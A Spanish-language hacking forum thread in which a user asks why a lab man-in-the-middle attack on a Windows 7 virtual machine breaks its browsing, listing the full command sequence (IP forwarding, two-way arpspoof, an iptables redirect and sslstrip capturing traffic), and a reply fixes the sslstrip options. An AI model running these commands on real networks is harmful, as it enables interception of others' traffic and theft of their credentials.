elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking / Re: Man In The Middle interesante pero complicado! en: 16 Enero 2014, 02:14 am
Hola a todos... Antes que nada grax por leer este POST. :=)
Ahora si, vamos al trabajo.
La pregunta es cual es el error que estoy cometiendo al intentar hacer un MAN IN THE MIDDLE.

LOS ELEMENTOS A UTILIZAR EN MI PRUEBA SON:

1 PC de Escritorio
1 Router Cisco

Nota: La conexión al Router es a traves de cable de red.En la Pc tengo corriendo Kali linux
como sistema nativo. Para las pruebas utilizo el Virtualbox. Al cual en esta prueba voy a hacer
correr un Windows 7 Sp1. En la solapa de red de la VBOX: Dice Conectado: a adaptador puente //
Nombre: eth0 // modo promiscuo: permitir todo. La ip de la maquina virtual es 192.168.1.108 y la ip del router es 192.168.1.1

Pasos seguidos despues de iniciar la maquina Virtual:

En una Terminal ejecuto las siguientes lineas de comando:
1. echo 1 >/proc/sys/net/ipv4/ip_forward  (para redireccionar el tráfico)
2. arpspoof -i eth0 -t 192.168.1.108 192.168.1.1 (para spoofear el trafico de la victima al cisco)
3. arpspoof -i eth0 -t 192.168.1.1 192.168.1.108 (idem al anterior pero a la inversa)
4. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
5. sslstrip -w pruebassl -a -k -l 1000 (utilizo el sslstrip -a para que registre y guarde todo
el trafico -k para que mate todas las sesiones en curso y el -l para que se ponga a la escucha en el
puerto 1000 y el -w para que todo lo guarde en el archivo pruebassl)

La pregunta es por que la maquina virtual no navega??
En el navegador se queda en esperando y la pagina en mi caso google.com. Lo mismo me ocurre en ya sea con Iexplorer o con el Chrome. E estado esperando a ver si veia algo extraño con el wireshark pero no logro dar con el error que estoy cometiendo. Como otro dato se pierde la conexion a nternet en la maquina virtual. A ver si alguien se piada y me puede dar una manito. Es todo desde ya muchas grax por la ayuda.




No navega por el -k. Como bien dices, mata la sesion una y otra vez, por eso no navega.
Cuando ejecutes sslstrip prueba de esta manera.

sudo sslstrip -w nombrecaputra.txt  (por ejemplo) y debería funcionar.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines